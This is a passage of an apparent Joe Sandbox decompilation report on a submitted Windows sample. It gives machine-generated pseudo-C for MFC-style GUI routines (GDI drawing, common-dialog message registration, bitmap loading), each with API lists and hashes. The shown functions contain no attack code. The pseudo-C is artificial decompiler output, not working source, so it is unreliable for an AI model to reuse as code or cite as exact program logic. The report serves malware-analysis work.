                  							 *((intOrPtr*)(_t365 - 0x20)) =  *((intOrPtr*)(_t365 - 0x20)) +  *(_t365 - 0x28);
                  							E0042D9B9( *(_t296 + 0x90),  *((intOrPtr*)(_t365 - 0x24)),  *((intOrPtr*)(_t365 - 0x20)));
                  							E0042DB24( *(_t296 + 0x90));
                  							 *((intOrPtr*)( *( *(_t296 + 0x8c)) + 0x180))( *(_t296 + 0x90),  *((intOrPtr*)(_t296 + 0x134)));
                  							 *((intOrPtr*)( *( *(_t296 + 0x90)) + 0x18))();
                  							 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x20))( *((intOrPtr*)(_t365 - 0x18)));
                  							 *(_t365 - 0x14) =  *(_t365 - 0x14) + 0x28;
                  							 *((intOrPtr*)(_t365 - 0x10)) = _t353;
                  							_t383 = _t353 -  *((intOrPtr*)(_t296 + 0x118));
                  							if(_t353 <  *((intOrPtr*)(_t296 + 0x118))) {
                  								_t353 =  *((intOrPtr*)(_t365 + 8));
                  								_t358 =  *((intOrPtr*)(_t365 - 0x10));
                  								L5:
                  								 *((intOrPtr*)(_t365 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x94)) + 0x1c))();
                  								if(_t353 != 0) {
                  									_t186 =  *((intOrPtr*)(_t353 + 4));
                  								} else {
                  									_t186 = 0;
                  								}
                  								_t347 =  *( *(_t296 + 0x90));
                  								 *((intOrPtr*)(_t347 + 0x10))(_t186);
                  								 *((intOrPtr*)( *((intOrPtr*)(_t296 + 0x134)) + 0x14)) =  *((intOrPtr*)(_t296 + 0x114)) + _t358;
                  								_t190 =  *((intOrPtr*)(_t296 + 0x114));
                  								if(_t190 + _t358 >= _t190) {
                  									_t345 = _t190 + _t358;
                  									if(_t345 >= _t358) {
                  										_t293 =  *((intOrPtr*)(_t296 + 0x134));
                  										_t347 =  *( *((intOrPtr*)( *_t293 + 0x74)) + 0x1e) & 0x0000ffff;
                  										if(_t345 <= _t347) {
                  											_t347 =  *( *(_t296 + 0x8c));
                  											 *((intOrPtr*)(_t347 + 0x160))( *(_t296 + 0x90), _t293);
                  										}
                  									}
                  								}
                  								goto L12;
                  							} else {
                  								goto L26;
                  							}
                  						}
                  					}
                  				}
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C90B
                    • Part of subcall function 0041B41D: GetViewportOrgEx.GDI32(?,?), ref: 0041B42B
                  • GetSysColor.USER32(00000006), ref: 0041C94F
                    • Part of subcall function 0041B3F9: CreatePen.GDI32(?,?,?), ref: 0041B40A
                  • GetSysColor.USER32(00000010), ref: 0041C96F
                  • GetDeviceCaps.GDI32(?,0000000A), ref: 0041CA29
                  • GetDeviceCaps.GDI32(?,00000008), ref: 0041CA39
                  • SetRect.USER32 ref: 0041CA4D
                  • GetClientRect.USER32 ref: 0041CACB
                    • Part of subcall function 00422AAE: SetWindowOrgEx.GDI32(?,?,?,?), ref: 00422ACF
                    • Part of subcall function 00422AAE: SetWindowOrgEx.GDI32(?,?,?,?), ref: 00422AE2
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                    • Part of subcall function 0041B443: Rectangle.GDI32(?,?,?,?,?), ref: 0041B459
                    • Part of subcall function 00422BBC: MoveToEx.GDI32(?,?,?,?), ref: 00422BDD
                    • Part of subcall function 00422BBC: MoveToEx.GDI32(?,?,?,?), ref: 00422BF0
                    • Part of subcall function 004226D4: MoveToEx.GDI32(?,?,?,00000000), ref: 004226F1
                    • Part of subcall function 004226D4: LineTo.GDI32(?,?,?), ref: 00422700
                  • GetStockObject.GDI32(00000000), ref: 0041CBC7
                  • FillRect.USER32 ref: 0041CBD8
                    • Part of subcall function 0042D602: GetViewportExtEx.GDI32(?,?), ref: 0042D615
                    • Part of subcall function 0042D602: GetWindowExtEx.GDI32(?,?), ref: 0042D622
                    • Part of subcall function 0042DB24: GetDeviceCaps.GDI32(?,0000000A), ref: 0042DB3B
                    • Part of subcall function 0042DB24: GetDeviceCaps.GDI32(?,00000008), ref: 0042DB44
                    • Part of subcall function 0042DB24: SetMapMode.GDI32(?,00000001), ref: 0042DB5C
                    • Part of subcall function 0042DB24: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 0042DB6A
                    • Part of subcall function 0042DB24: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0042DB7A
                    • Part of subcall function 0042DB24: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 0042DB95
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CapsDeviceRectWindow$MoveObjectViewport$ColorSelect$ClientClipCreateFillH_prolog3IntersectLineModeRectangleStock
                  • String ID: ($</E$</E$</E
                  • API String ID: 4163831729-2541786092
                  • Opcode ID: f0e1fe2535ffc2d713cc78e5f4c5b5910e9f6dc1d354313586de08d357af2196
                  • Instruction ID: 4748042c30c6ea2c037a8edb363e0c25ba98aba555b109a0587ae0009503a143
                  • Opcode Fuzzy Hash: f0e1fe2535ffc2d713cc78e5f4c5b5910e9f6dc1d354313586de08d357af2196
                  • Instruction Fuzzy Hash: 99E13A71A002199FCB05DFA8D985FEDB7B6FF48304F1440AAE919AB256CB34A941CF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E0042A570(void* __ebx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t31;
                  				signed int _t33;
                  				void* _t40;
                  				int _t46;
                  				void* _t51;
                  				intOrPtr _t52;
                  				signed int _t58;
                  				signed int* _t66;
                  				void* _t67;
                  				signed int _t68;
                  				signed int _t70;
                  
                  				_t51 = __ebx;
                  				if(_a4 != 0) {
                  					_push(_t67);
                  					_push(0x406452);
                  					_t54 = 0x466508;
                  					_t68 = E00420AEC(__ebx, 0x466508, 0, _t67, __eflags);
                  					__eflags = _t68;
                  					if(__eflags == 0) {
                  						E00406436(__ebx, 0x466508, 0, _t68, __eflags);
                  					}
                  					__eflags =  *(_t68 + 0x18);
                  					if(__eflags != 0) {
                  						__eflags = E0040EE68(_t54, 0, _t68, __eflags, _a4);
                  						if(__eflags == 0) {
                  							_t54 =  *(_t68 + 0x18);
                  							E0040FCD3( *(_t68 + 0x18), __eflags, _a4);
                  							 *(_t68 + 0x18) = 0;
                  						}
                  					}
                  					_push(_t51);
                  					_t52 = _a8;
                  					__eflags = _t52 - 0x110;
                  					if(_t52 != 0x110) {
                  						__eflags = _t52 -  *0x466928; // 0x0
                  						if(__eflags == 0) {
                  							L25:
                  							SendMessageA(_a4, 0x111, 0xe146, 0);
                  							_t31 = 1;
                  							__eflags = 1;
                  							goto L26;
                  						}
                  						__eflags = _t52 - 0x111;
                  						if(_t52 != 0x111) {
                  							L12:
                  							__eflags = _t52 - 0xc000;
                  							if(__eflags < 0) {
                  								L22:
                  								_t31 = 0;
                  								goto L26;
                  							}
                  							_t70 = E0040EE68(_t54, 0x110, _t68, __eflags, _a4);
                  							__eflags = _t70;
                  							if(_t70 == 0) {
                  								goto L22;
                  							}
                  							_t33 = E0041E99D(_t70, 0x454738);
                  							__eflags = _t33;
                  							if(_t33 == 0) {
                  								L16:
                  								__eflags = _t52 -  *0x46691c; // 0x0
                  								if(__eflags != 0) {
                  									__eflags = _t52 -  *0x466920; // 0x0
                  									if(__eflags != 0) {
                  										__eflags = _t52 -  *0x466918; // 0x0
                  										if(__eflags != 0) {
                  											__eflags = _t52 -  *0x466924; // 0x0
                  											if(__eflags != 0) {
                  												goto L22;
                  											}
                  											_t31 =  *((intOrPtr*)( *_t70 + 0x164))();
                  											goto L26;
                  										}
                  										_t58 = _a16 >> 0x10;
                  										__eflags = _t58;
                  										 *((intOrPtr*)( *_t70 + 0x16c))(_a12, _a16 & 0x0000ffff, _t58);
                  										goto L22;
                  									}
                  									_t19 = _t70 + 0x1d4; // 0x1d4
                  									_t66 = _t19;
                  									 *_t66 = _a16;
                  									_t31 =  *((intOrPtr*)( *_t70 + 0x168))();
                  									 *_t66 =  *_t66 & 0x00000000;
                  									goto L26;
                  								}
                  								_t31 =  *((intOrPtr*)( *_t70 + 0x164))(_a16);
                  								goto L26;
                  							}
                  							_t40 = E00417298(_t70);
                  							__eflags =  *(_t40 + 0x34) & 0x00080000;
                  							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
                  								goto L22;
                  							}
                  							goto L16;
                  						}
                  						_t54 = 0x40e;
                  						__eflags = _a12 - 0x40e;
                  						if(_a12 == 0x40e) {
                  							goto L25;
                  						}
                  						goto L12;
                  					} else {
                  						 *0x466918 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
                  						 *0x46691c = RegisterClipboardFormatA("commdlg_ShareViolation");
                  						 *0x466920 = RegisterClipboardFormatA("commdlg_FileNameOK");
                  						 *0x466924 = RegisterClipboardFormatA("commdlg_ColorOK");
                  						 *0x466928 = RegisterClipboardFormatA("commdlg_help");
                  						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
                  						_push(_a16);
                  						 *0x46692c = _t46;
                  						_push(_a12);
                  						_t31 = E00417499(_t52, _t54, 0x110, RegisterWindowMessageA, _a4, 0x110);
                  						L26:
                  						return _t31;
                  					}
                  				}
                  				return 0;
                  			}

















                  APIs
                  • RegisterClipboardFormatA.USER32 ref: 0042A5D6
                  • RegisterClipboardFormatA.USER32 ref: 0042A5E2
                  • RegisterClipboardFormatA.USER32 ref: 0042A5EE
                  • RegisterClipboardFormatA.USER32 ref: 0042A5FA
                  • RegisterClipboardFormatA.USER32 ref: 0042A606
                  • RegisterClipboardFormatA.USER32 ref: 0042A612
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClipboardFormatRegister
                  • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                  • API String ID: 1228543026-3888057576
                  • Opcode ID: a71ff197eab65d9337ce50063d1dea6a73ac7128dca34fbf681d27b19aded0f9
                  • Instruction ID: b1fb21f4436616dfddf3654ade33f9c9fefc51839f7fc6c1fd550e6eedef1f38
                  • Opcode Fuzzy Hash: a71ff197eab65d9337ce50063d1dea6a73ac7128dca34fbf681d27b19aded0f9
                  • Instruction Fuzzy Hash: A841D270700225EBCF219F21ED88A6E3BA1EB84314B65043BFC415B251D77D88A5CBAF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004099A0(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
                  				signed int _v8;
                  				char _v12;
                  				int _v16;
                  				intOrPtr _v20;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t68;
                  				char _t70;
                  				int _t72;
                  				int* _t74;
                  				int _t77;
                  				intOrPtr _t85;
                  				struct HWND__* _t88;
                  				struct HWND__* _t93;
                  				struct HMENU__* _t95;
                  				struct HWND__* _t97;
                  				int _t104;
                  				intOrPtr* _t116;
                  				int* _t119;
                  				RECT* _t135;
                  				intOrPtr* _t138;
                  				signed int _t156;
                  
                  				_t120 = __ecx;
                  				_t119 = _a8;
                  				_t135 = 0;
                  				_t138 = __ecx;
                  				_t139 = _t119;
                  				if(_t119 != 0) {
                  					L2:
                  					_t68 =  *((intOrPtr*)( *_t138 + 0x148))();
                  					_v20 = _t68;
                  					if(_t68 == _t135) {
                  						goto L1;
                  					}
                  					if(_a4 != _t135) {
                  						_t116 = _t68 - 0xffffff80;
                  						if( *_t116 != _t135) {
                  							 *((intOrPtr*)( *((intOrPtr*)( *_t116)) + 0x5c))(_t135);
                  						}
                  					}
                  					_t70 =  *((intOrPtr*)(_t138 + 0x88));
                  					_a8 = _t135;
                  					_v12 = _t70;
                  					if(_t70 == _t135) {
                  						L16:
                  						_t119[2] = _a8;
                  						if(_a4 == _t135) {
                  							 *(_t138 + 0xb4) = _t135;
                  							_t72 = GetDlgItem( *(_t138 + 0x20), 0xea21);
                  							_a4 = _t72;
                  							__eflags = _t72;
                  							if(_t72 != 0) {
                  								_t88 = GetDlgItem( *(_t138 + 0x20), 0xe900);
                  								__eflags = _t88;
                  								if(_t88 != 0) {
                  									SetWindowLongA(_t88, 0xfffffff4, 0xea21);
                  								}
                  								SetWindowLongA(_a4, 0xfffffff4, 0xe900);
                  							}
                  							__eflags = _t119[1];
                  							if(_t119[1] != 0) {
                  								InvalidateRect( *(_t138 + 0x20), 0, 1);
                  								_t85 =  *((intOrPtr*)(_t138 + 0xd4));
                  								__eflags = _t85 - 1;
                  								if(_t85 != 1) {
                  									__eflags = _t85 - 2;
                  									if(_t85 == 2) {
                  										 *(_t138 + 0xd8) = _t119[1];
                  									}
                  								} else {
                  									SetMenu( *(_t138 + 0x20), _t119[1]);
                  								}
                  							}
                  							_t74 = _v20 - 0xffffff80;
                  							__eflags =  *_t74;
                  							if( *_t74 != 0) {
                  								 *((intOrPtr*)( *( *_t74) + 0x5c))(1);
                  							}
                  							 *((intOrPtr*)( *_t138 + 0x150))(1);
                  							_t77 =  *_t119;
                  							__eflags = _t77 - 0xe900;
                  							if(_t77 != 0xe900) {
                  								_a4 = GetDlgItem( *(_t138 + 0x20), _t77);
                  							}
                  							ShowWindow(_a4, 5);
                  							 *(_t138 + 0x60) = _t119[5];
                  							return E0040819E(_t138, 1);
                  						}
                  						 *(_t138 + 0xb4) = _t119[4];
                  						E0040819E(_t138, _t135);
                  						_t93 = GetDlgItem( *(_t138 + 0x20),  *_t119);
                  						_a4 = _t93;
                  						ShowWindow(_t93, _t135);
                  						if( *((intOrPtr*)(_t138 + 0xd4)) != 1) {
                  							_t95 =  *(_t138 + 0xd8);
                  						} else {
                  							_t95 = GetMenu( *(_t138 + 0x20));
                  						}
                  						_t119[1] = _t95;
                  						if(_t95 != _t135) {
                  							InvalidateRect( *(_t138 + 0x20), _t135, 1);
                  							 *((intOrPtr*)( *_t138 + 0x70))(_t135);
                  							_t38 = _t138 + 0xe4;
                  							 *_t38 =  *(_t138 + 0xe4) & 0xfffffffe;
                  							_t156 =  *_t38;
                  						}
                  						_t119[5] =  *(_t138 + 0x60);
                  						 *(_t138 + 0x60) = _t135;
                  						_t97 = E00408862(_t138, _t156, 0x7915);
                  						if( *_t119 != 0xe900) {
                  							_t97 = GetDlgItem( *(_t138 + 0x20), 0xe900);
                  							_a4 = _t97;
                  						}
                  						if(_a4 == 0) {
                  							return _t97;
                  						} else {
                  							return SetWindowLongA(_a4, 0xfffffff4, 0xea21);
                  						}
                  					} else {
                  						goto L7;
                  					}
                  					while(1) {
                  						L7:
                  						_t120 = _t138 + 0x84;
                  						_t135 =  *(E00408692( &_v12));
                  						if(_t135 == 0) {
                  							goto L1;
                  						}
                  						_t104 = GetDlgCtrlID( *(_t135 + 0x20));
                  						_t12 = _t104 - 0xe800; // -59392
                  						_v16 = _t104;
                  						if(_t12 <= 0x1f) {
                  							_t14 = _t104 - 0xe800; // -59392
                  							_v8 = 1 << _t14;
                  							if( *((intOrPtr*)(_t135->left + 0x168))() != 0) {
                  								_a8 = _a8 | _v8;
                  							}
                  							if( *((intOrPtr*)(_t135->left + 0x170))() == 0 || _v16 != 0xe81f) {
                  								E00409395(_t138, _t135, _t119[2] & _v8, 1);
                  							}
                  						}
                  						if(_v12 != 0) {
                  							continue;
                  						} else {
                  							_t135 = 0;
                  							goto L16;
                  						}
                  					}
                  				}
                  				L1:
                  				E00406436(_t119, _t120, _t135, _t138, _t139);
                  				goto L2;
                  			}



























                  APIs
                  • GetDlgCtrlID.USER32 ref: 00409A08
                  • GetDlgItem.USER32 ref: 00409A93
                  • ShowWindow.USER32(00000000,00000000), ref: 00409A9E
                  • GetMenu.USER32(?), ref: 00409AB0
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00409ACB
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 00408862: LoadAcceleratorsA.USER32 ref: 00408876
                  • GetDlgItem.USER32 ref: 00409B02
                  • SetWindowLongA.USER32 ref: 00409B1F
                  • GetDlgItem.USER32 ref: 00409B38
                  • GetDlgItem.USER32 ref: 00409B4E
                  • SetWindowLongA.USER32 ref: 00409B60
                  • SetWindowLongA.USER32 ref: 00409B6C
                  • InvalidateRect.USER32(00000001,00000000,00000001), ref: 00409B7F
                  • SetMenu.USER32(00000000,00000000), ref: 00409B96
                  • GetDlgItem.USER32 ref: 00409BD8
                  • ShowWindow.USER32(?,00000005), ref: 00409BE6
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ItemWindow$Long$InvalidateMenuRectShow$AcceleratorsCtrlException@8H_prolog3LoadThrow
                  • String ID:
                  • API String ID: 3936809299-0
                  • Opcode ID: b352d2020b62d51676351764611a56fc418ce6e28d429af2f06858860da0063b
                  • Instruction ID: 49f4313a46f8779e85f491cfa16612e5cc4f4d1fc540ba0bed8de8191aba7d04
                  • Opcode Fuzzy Hash: b352d2020b62d51676351764611a56fc418ce6e28d429af2f06858860da0063b
                  • Instruction Fuzzy Hash: 01814034600600EFCB219F79C888A5ABBB5FF49710F14896AF956EB2A1DB75AD40CF04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E00406B0C(signed int _a4, signed int _a8, int _a12) {
                  				BITMAPINFO* _v8;
                  				struct HDC__* _v12;
                  				void* _v16;
                  				void* _v20;
                  				void* _v24;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t53;
                  				BITMAPINFO* _t54;
                  				BITMAPINFO* _t59;
                  				signed char _t63;
                  				struct HDC__* _t69;
                  				struct HBITMAP__* _t70;
                  				void* _t74;
                  				struct HDC__* _t75;
                  				struct HWND__* _t84;
                  				intOrPtr* _t92;
                  				void* _t97;
                  				signed int _t98;
                  				intOrPtr _t102;
                  				int* _t103;
                  				int _t104;
                  				BITMAPINFO* _t107;
                  
                  				_t53 = LoadResource(_a4, _a8);
                  				_t84 = 0;
                  				_v24 = _t53;
                  				if(_t53 != 0) {
                  					_t54 = LockResource(_t53);
                  					_v8 = _t54;
                  					__eflags = _t54;
                  					if(_t54 == 0) {
                  						goto L1;
                  					}
                  					_t101 = _t54->bmiHeader + 0x40;
                  					_t107 = E0043108C(0, _t97, _t54->bmiHeader + 0x40, _t54->bmiHeader + 0x40);
                  					__eflags = _t107;
                  					if(_t107 != 0) {
                  						E004059F9(_t101, _t107, _t107, _t101, _v8, _t101);
                  						_t59 = _t107 + _t107->bmiHeader;
                  						__eflags = _t59;
                  						_v12 = _t59;
                  						_a8 = 0;
                  						do {
                  							_t92 = _t59 + _a8 * 4;
                  							_t102 =  *_t92;
                  							_t98 = 0;
                  							__eflags = 0;
                  							_v16 = _t92;
                  							while(1) {
                  								__eflags = _t102 -  *((intOrPtr*)(0x44fbec + _t98 * 8));
                  								if(_t102 ==  *((intOrPtr*)(0x44fbec + _t98 * 8))) {
                  									break;
                  								}
                  								_t98 = _t98 + 1;
                  								__eflags = _t98 - 4;
                  								if(_t98 < 4) {
                  									continue;
                  								}
                  								goto L14;
                  							}
                  							__eflags = _a12 - _t84;
                  							if(_a12 == _t84) {
                  								_t103 = 0x44fbf0 + _t98 * 8;
                  								_a4 = GetSysColor( *_t103) >> 0x00000008 & 0x000000ff;
                  								_t63 = GetSysColor( *_t103);
                  								 *_v16 = GetSysColor( *_t103) >> 0x00000010 & 0x000000ff | ((_t63 & 0x000000ff) << 0x00000008 | _a4) << 0x00000008;
                  								_t59 = _v12;
                  								_t84 = 0;
                  								__eflags = 0;
                  							} else {
                  								__eflags =  *(0x44fbf0 + _t98 * 8) - 0x12;
                  								if( *(0x44fbf0 + _t98 * 8) != 0x12) {
                  									 *_t92 = 0xffffff;
                  								}
                  							}
                  							L14:
                  							_a8 = _a8 + 1;
                  							__eflags = _a8 - 0x10;
                  						} while (_a8 < 0x10);
                  						_t104 = _t107->bmiHeader.biWidth;
                  						_a12 = _t104;
                  						_a8 = _t107->bmiHeader.biHeight;
                  						_t69 = GetDC(_t84);
                  						_v12 = _t69;
                  						_t70 = CreateCompatibleBitmap(_t69, _t104, _a8);
                  						_v16 = _t70;
                  						__eflags = _t70 - _t84;
                  						if(__eflags != 0) {
                  							_t75 = CreateCompatibleDC(_v12);
                  							_t104 = SelectObject;
                  							_a4 = _t75;
                  							_v20 = SelectObject(_t75, _v16);
                  							__eflags = 1;
                  							StretchDIBits(_a4, _t84, _t84, _a12, _a8, _t84, _t84, _a12, _a8, _v8 + 0x28 + (1 << _t107->bmiHeader.biBitCount) * 4, _t107, _t84, 0xcc0020);
                  							SelectObject(_a4, _v20);
                  							DeleteDC(_a4);
                  						}
                  						ReleaseDC(_t84, _v12);
                  						_push(_t107);
                  						E004316F6(_t84, _t104, _t107, __eflags);
                  						FreeResource(_v24);
                  						_t74 = _v16;
                  						goto L18;
                  					} else {
                  						_t74 = 0;
                  						L18:
                  						return _t74;
                  					}
                  				}
                  				L1:
                  				return 0;
                  			}




























                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$LoadLock_malloc
                  • String ID:
                  • API String ID: 2582927105-0
                  • Opcode ID: 8cdaa2f3bf9c54f2ba2fe1be78cdd77049d2bf2b09ec426ef17af4b37fb9623c
                  • Instruction ID: ff51ff42c0de1c3a1b4d8765aabfec9eb562106eb3c68f9e24e3f7d0f5cce2f8
                  • Opcode Fuzzy Hash: 8cdaa2f3bf9c54f2ba2fe1be78cdd77049d2bf2b09ec426ef17af4b37fb9623c
                  • Instruction Fuzzy Hash: D9519FB5800218FFDB019FA5CC888AE7BB5FF49314B11843AF916E7260C735AA61DF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E0042CFF6(intOrPtr* __ecx) {
                  				void* _v8;
                  				void* _t19;
                  				void* _t21;
                  				void* _t45;
                  
                  				_push(__ecx);
                  				if( *(__ecx + 4) != 0) {
                  					_t21 = SelectObject( *(__ecx + 8), GetStockObject(7));
                  					_v8 = _t21;
                  					SelectObject( *(__ecx + 8), _t21);
                  					SelectObject( *(__ecx + 4), _v8);
                  					_t45 = SelectObject( *(__ecx + 8), GetStockObject(4));
                  					SelectObject( *(__ecx + 8), _t45);
                  					SelectObject( *(__ecx + 4), _t45);
                  					E00422568(__ecx, GetROP2( *(__ecx + 8)));
                  					E00422504(__ecx, GetBkMode( *(__ecx + 8)));
                  					E0042270B(__ecx, GetTextAlign( *(__ecx + 8)));
                  					E00422536(__ecx, GetPolyFillMode( *(__ecx + 8)));
                  					E0042259A(__ecx, GetStretchBltMode( *(__ecx + 8)));
                  					_push(E0042CF92(__ecx, GetTextColor( *(__ecx + 8))));
                  					 *((intOrPtr*)( *__ecx + 0x30))();
                  					_push(E0042CF92(__ecx, GetBkColor( *(__ecx + 8))));
                  					_t19 =  *((intOrPtr*)( *__ecx + 0x2c))();
                  				}
                  				return _t19;
                  			}








                  APIs
                  • GetStockObject.GDI32(00000007), ref: 0042D013
                  • SelectObject.GDI32(?,00000000), ref: 0042D01F
                  • SelectObject.GDI32(?,00000000), ref: 0042D028
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D030
                  • GetStockObject.GDI32(00000004), ref: 0042D034
                  • SelectObject.GDI32(?,00000000), ref: 0042D03A
                  • SelectObject.GDI32(?,00000000), ref: 0042D042
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D048
                  • GetROP2.GDI32(?), ref: 0042D04D
                    • Part of subcall function 00422568: SetROP2.GDI32(?,?), ref: 00422585
                    • Part of subcall function 00422568: SetROP2.GDI32(?,?), ref: 00422592
                  • GetBkMode.GDI32(?), ref: 0042D05E
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 00422521
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 0042252E
                  • GetTextAlign.GDI32(?), ref: 0042D06F
                    • Part of subcall function 0042270B: SetTextAlign.GDI32(?,?), ref: 0042272A
                    • Part of subcall function 0042270B: SetTextAlign.GDI32(?,?), ref: 00422737
                  • GetPolyFillMode.GDI32(?), ref: 0042D080
                    • Part of subcall function 00422536: SetPolyFillMode.GDI32(?,?), ref: 00422553
                    • Part of subcall function 00422536: SetPolyFillMode.GDI32(?,?), ref: 00422560
                  • GetStretchBltMode.GDI32(?), ref: 0042D091
                    • Part of subcall function 0042259A: SetStretchBltMode.GDI32(?,?), ref: 004225B7
                    • Part of subcall function 0042259A: SetStretchBltMode.GDI32(?,?), ref: 004225C4
                  • GetTextColor.GDI32(?), ref: 0042D0A2
                    • Part of subcall function 0042CF92: GetNearestColor.GDI32(?,?), ref: 0042CF9D
                  • GetBkColor.GDI32(?), ref: 0042D0BB
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Mode$Object$Select$Text$AlignColorFillPolyStretch$Stock$Nearest
                  • String ID:
                  • API String ID: 1146216143-0
                  • Opcode ID: b5fa28f46895a85eae3298702a4519f40f3671a29730695325d86269032407d6
                  • Instruction ID: 2f3b6f2030e1e86d12445eb7730afd10813b0898199679e719625b019b3605a4
                  • Opcode Fuzzy Hash: b5fa28f46895a85eae3298702a4519f40f3671a29730695325d86269032407d6
                  • Instruction Fuzzy Hash: C2216075200A24BFCB217B67DD08D2FBAEAFF88704740842DF15A82570CB75AD52DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00426E96(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4) {
                  				signed int _v8;
                  				long _v32;
                  				char _v268;
                  				char _v292;
                  				void* _v296;
                  				signed int _v300;
                  				char _v304;
                  				signed int _v308;
                  				long _v312;
                  				char _v316;
                  				char _v320;
                  				signed int _t103;
                  				void* _t110;
                  				long _t115;
                  				signed int _t125;
                  				signed int _t129;
                  				signed int _t131;
                  				signed int _t139;
                  				intOrPtr _t142;
                  				void* _t146;
                  				intOrPtr* _t148;
                  				void* _t171;
                  				void* _t181;
                  				void* _t183;
                  				int _t184;
                  				signed int _t185;
                  				intOrPtr* _t186;
                  				signed int _t187;
                  				intOrPtr _t188;
                  				int _t203;
                  				void* _t220;
                  				CHAR* _t222;
                  				intOrPtr* _t223;
                  				signed int _t224;
                  				void* _t225;
                  				intOrPtr* _t227;
                  				signed int _t228;
                  				void* _t229;
                  				signed int _t231;
                  				signed int _t233;
                  				void* _t234;
                  
                  				_t220 = __edx;
                  				_t186 = __ecx;
                  				_t181 = __ebx;
                  				_t231 = _t233;
                  				_t234 = _t233 - 0x108;
                  				_t103 =  *0x463404; // 0x38a11573
                  				_v8 = _t103 ^ _t231;
                  				_push(__esi);
                  				_push(__edi);
                  				_t222 = _a4;
                  				_t227 = __ecx;
                  				if(_t222 == 0 || lstrlenA(_t222) >= 0x104) {
                  					_push(0);
                  					_push(0xffffffff);
                  					_push(3);
